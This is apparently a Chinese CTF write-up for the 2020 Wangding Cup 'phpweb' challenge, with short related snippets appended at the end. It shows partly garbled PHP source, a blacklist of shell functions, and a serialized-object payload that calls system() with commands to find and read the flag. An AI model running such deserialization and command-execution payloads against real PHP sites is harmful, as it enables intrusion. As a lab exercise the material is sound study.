網鼎盃 2020 朱雀組 phpweb

2022-07-20 19:33:11 字數 2621 閱讀 2121

進來的頁面不對勁,雖然不知道什麼梗但是有一說一確實醜,如果注意一下還會發現這個頁面在不斷重新整理,先抓個包看看。

發現這裡上傳了兩個引數,分別是funcp

func猜測是function,p應該是payload(猜的),那麼簡單明瞭的東西應該是乙個呼叫func上傳的函式名,引數採用p傳上來的引數。於是構造:

原始碼:

<?php 

$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");

function gettime($func, $p) else

}class test }}

$func = $_request["func"];

$p = $_request["p"];

if ($func != null) else

}?>

得到原始碼以後才知道原來是call_user_func()函式,還是見得少了,大佬估計直接能看出來是這個函式,我還要靠猜。

$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
這裡那麼多函式被禁了,主要還是禁了system比較難受,但是問題不大,畢竟沒有禁file_get_contentscat以及serialize

這裡serialize才是重點(敲黑板!),畢竟原始碼裡給我們提供了乙個test類

class test }}

然後簡單明瞭構造payload:

<?php 

class test }}

$a = new test();

// $a->p = 'ls ../../../'; ==> o:4:"test":2:

// $a -> p = "find / -name 'flag*'"; ⇒ o:4:"test":2:

$a -> p = 'cat /tmp/flagoefiu4r93'; // ==> o:4:"test":2:

$a -> func = 'system';

echo (serialize($a));

?>

這裡利用p引數前後構造了三個payload,flag:

網鼎盃2020朱雀組 web

nmap那題就基本命令然後還有乙個別的方法。用的是nmap,提示 一開始以為是ping命令,後來發現過濾了php。後來試了下nmap的命令組合成功了。payload il flag on flag.txt 存入flag.txt之後直接訪問就行了 php escapeshell 命令執行 因為過濾了p...

網鼎盃 2020 朱雀組 phpweb

在這裡插入 片 重新整理過後 看到他兩個post引數 他名字提示的很明顯了,就是這個函式可以進行任意更改 我起初換成system 直接命令執行 可能他過濾了某些函式,那就讀一下index.php的內容 disable fun array exec shell exec system passthru...

網鼎盃 2020 朱雀組 phpweb

抓包之後是這麼個玩意 func是乙個函式名,而p是乙個引數,所以可以猜測用func來執行p 我們試一試highlight file和index.php 有回顯但是很亂 用func file get contents p index.php disable fun array exec shell e...